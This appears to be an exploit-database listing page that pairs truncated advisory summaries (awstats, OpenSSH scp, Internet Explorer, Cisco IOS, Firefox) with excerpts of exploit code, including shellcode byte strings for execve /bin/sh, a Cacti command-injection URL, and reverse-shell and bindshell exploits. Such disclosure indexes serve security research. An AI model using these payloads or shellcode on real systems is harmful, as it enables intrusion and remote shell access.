awstats -- arbitrary command execution vulnerability

OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character "|" leads to an insecure call to Perl's open function and...

Microsoft Windows shell code execution

COM object can execute code. Can be used for hidden malware installation with Internet Explorer...

Ubuntu 4.10 / 5.04 / 5.10 : openssh vulnerability (USN-255-1)

Tomas Mraz discovered a shell code injection flaw in scp. When doing local-to-local or remote-to-remote copying, scp expanded shell escape characters. By tricking an user into using scp on a specially crafted file name which could also be caught by using an innocuous wild card like '', an attacke...

USN-255-1: openssh vulnerability

Tomas Mraz discovered a shell code injection flaw in scp. When doing local-to-local or remote-to-remote copying, scp expanded shell escape characters. By tricking an user into using scp on a specially crafted file name which could also be caught by using an innocuous wild card like '', an attacke...

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)

Exploit for unknown platform in category dos / poc =============================================================== Windows Media Player 7.1 include define BITMAPFILESIZE 0xA8D2 define BITMAPFILENAME "crafted.bmp" pragma pack push pragma pack 1 // bitmap file format - http:/...

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)

No description provided by source. // Two includes. include fstream.h include winsock2.h // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"...

sco/x86 execve("/bin/sh", ..., NULL); 43 bytes

Exploit for sco/x86 platform in category shellcode ============================================== sco/x86 execve"/bin/sh", ..., NULL; 43 bytes ============================================== / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / inclu...

Microsoft Internet Explorer vulnerable to code execution via mismatched DOM objects

Overview Microsoft Internet Explorer fails to properly handle requests to mismatched DOM objects, which may allow a remote attacker to execute arbitrary code on a vulnerable system. Description Microsoft Internet Explorer does not properly handle requests to mismatched DOM objects, such as the...

linux/x86 dup2(0,0); dup2(0,1); dup2(0,2); 15 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes =================================================== / dup2loop-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular...

Webnews.exe Buffer Overflow Vulnerability

The remote host appears to be running WebNews, which offers web-based access to Usenet news. This CGI script suffers from a buffer overflow vulnerability. SPDX-FileCopyrightText: 2003 John Lampe Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...

Firefox < 1.0.7 Multiple Vulnerabilities

The remote host is using Firefox, an alternative web browser. The installed version of Firefox contains various security issues, several of which are critical as they can be easily exploited to execute arbitrary shell code on the remote host. C Tenable Network Security, Inc. include"compat.inc"; ...

Cisco IOS OSPF neighbor IO buffer overflow

Overview Cisco Internetwork Operating System IOS is the operating system for the majority of Cisco routers. Open Shortest-Path First OSPF is a interior routing protocol. A flaw in some Cisco IOS versions can allow a buffer overflow when handling a large number of OSPF neighbor connection requests...

Cacti <= 0.8.6d Remote Command Execution Exploit

Exploit for unknown platform in category web applications ================================================ Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version http://www.cacti.net/downloadcacti.php Discovered and Code...

Cacti 0.8.6d - Remote Command Execution

Cacti 0.8.6d - Remote Command Execution Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: downloa...

Cacti &lt;= 0.8.6d Remote Command Execution Exploit

No description provided by source. Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti = 0.8.6d This exploit open a remote shell on the targets that uses Cacti TARGET HOST MUST BE A GNU/LINUX SERVER,...

msjet40.txt

See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service Pack 1 ReturnAddress = 0x77F51B93 Address of "jmp edx...

Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2

No description provided by source. / v0.2 Newspost "socketgetline" Buffer Overflow Exploit Exploit Bug discovered: 02/03/2005 cybertronicatgmxdotnet cybertronic @ newspost $ gcc -o newspostexpl newspostexpl.c cybertronic @ newspost $ ./newspostexpl cyber tronic Usage ----- Bindshell ./newspostexp...

bsdi/x86 - execve /bin/sh 46 bytes

bsdi/x86 execve /bin/sh 46 bytes. Shellcode exploit for bsdix86 platform / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

linux/x86 unix/SPARC execve /bin/sh 80 bytes

linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...

linux/x86 execve /bin/sh 30 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...